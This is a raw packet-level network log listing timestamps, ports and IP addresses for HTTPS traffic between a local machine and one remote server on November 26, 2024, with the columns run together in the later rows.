Nov 26, 2024 08:12:21.146317959 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.146507978 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.146554947 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.146559954 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.147391081 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.147440910 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.147445917 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.156332970 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.156388998 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.156400919 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.156785011 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.156831980 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.156841040 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.157690048 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.157757998 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.157766104 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.166811943 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.166873932 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.166888952 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.167155027 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.167212963 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.167218924 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.168029070 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.168096066 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.168103933 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.179394007 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.179469109 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.179481030 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.179785013 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.179837942 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.179843903 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.180536985 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.180588007 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.180593967 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.190057993 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.190131903 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.190141916 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.190357924 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.190402031 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.190407038 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.192091942 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.192142010 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.192150116 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.200607061 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.200668097 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.200678110 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.201806068 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.201859951 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.201874018 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.202693939 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.202754021 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.202761889 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.210330009 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.210413933 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.210424900 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.210725069 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.210769892 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.210777044 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.212367058 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.212425947 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.212435007 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.219835997 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.219923019 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.219940901 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.220251083 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.220299006 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.220307112 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.221725941 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.221791983 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.221801043 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.228451014 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.228506088 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.228518009 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.229734898 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.229799986 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.229808092 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.230618954 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.230665922 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.230671883 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.238049030 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.238112926 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.238143921 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.238156080 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.238208055 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.238929033 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.253051996 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.253082991 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.253118038 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.253123999 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.253137112 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.253156900 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.254219055 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.254265070 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.254272938 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.255143881 CET  443          49706      142.250.181.129  192.168.2.8
Nov 26, 2024 08:12:21.255187988 CET  49706        443        192.168.2.8      142.250.181.129
Nov 26, 2024 08:12:21.255196095 CET  443          49706      142.250.181.129  192.168.2.8
                                                                    Nov 26, 2024 08:12:21.267767906 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.267828941 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.267841101 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.268691063 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.268738031 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.268745899 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.282124996 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.282197952 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.282207966 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.282491922 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.282541037 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.282546997 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.283507109 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.283550978 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.283559084 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.297194004 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.297256947 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.297267914 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.297502995 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.297555923 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.297563076 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.298331976 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.298430920 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.298437119 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.310414076 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.310471058 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.310482979 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.310739994 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.310785055 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.310791016 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.311510086 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.311556101 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.311563015 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.324493885 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.324549913 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.324562073 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.324955940 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.325000048 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.325006962 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.325860977 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.325927973 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.325936079 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.338915110 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.338990927 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.339004993 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.339032888 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.339080095 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.339308977 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.340451002 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.340497017 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.340507984 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.348735094 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.348813057 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.348824978 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.348989964 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.349035025 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.349041939 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.350527048 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.350578070 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.350586891 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.358598948 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.358695030 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.358705997 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.359111071 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.359153986 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.359160900 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.359978914 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.360033035 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.360040903 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.370349884 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.370404959 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.370414972 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.370732069 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.370779991 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.370784998 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.371781111 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.371826887 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.371835947 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.381638050 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.381719112 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.381730080 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.382734060 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.382791996 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.382802010 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.383671045 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.383721113 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.383728027 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.392821074 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.392883062 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.392896891 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.393227100 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.393275023 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.393281937 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.394098997 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.394145966 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.394154072 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.402492046 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.402548075 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.402559996 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.402791977 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.402852058 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.402857065 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.403728008 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.403773069 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.403780937 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.411593914 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.411698103 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.411709070 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.412004948 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.412050009 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.412055969 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.412929058 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.412976980 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.412983894 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.421222925 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.421282053 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.421293020 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.421596050 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.421690941 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.421699047 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.422468901 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.422511101 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.422518969 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.429822922 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.429888010 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.429898977 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.430351019 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.430397987 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.430403948 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.431898117 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.431950092 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.431960106 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.444963932 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.445024967 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.445050955 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.445373058 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.445415020 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.445420980 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.446337938 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.446384907 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.446392059 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.459523916 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.459583998 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.459597111 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.460021019 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.460068941 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.460076094 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.461591005 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.461647034 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.461654902 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.474201918 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.474271059 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.474283934 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.474919081 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.474963903 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.474972963 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.476305962 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.476356030 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.476365089 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.488796949 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.488878012 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.488943100 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.490031958 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.490087032 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.490103006 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.490948915 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.491003990 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.491018057 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.502207994 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.502274036 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.502311945 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.502331018 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.502393007 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.503050089 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.504008055 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.504072905 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.504086018 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.516763926 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.516861916 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.516894102 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.517816067 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.517865896 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.517879009 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.518630028 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.518681049 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.518686056 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.530757904 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.530826092 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.530879021 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.530931950 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.531006098 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.531584024 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.540407896 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.540503025 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.540510893 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.540535927 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.540596962 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.540797949 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.541696072 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.541757107 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.541771889 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.550610065 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.901596069 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.902488947 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.902555943 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.902560949 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.914469004 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.914571047 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.914577961 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.915026903 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.915071011 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.915076017 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.915823936 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.915867090 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.915872097 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.924582958 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.924642086 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.924647093 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.925029039 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.925071955 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.925077915 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.925880909 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.925920010 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.925924063 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.934912920 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.934978962 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.934986115 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.935817003 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.935866117 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.935870886 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.936755896 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.936805964 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.936811924 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.946616888 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.946717978 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.946731091 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.947575092 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.947626114 CET49706443192.168.2.8142.250.181.129
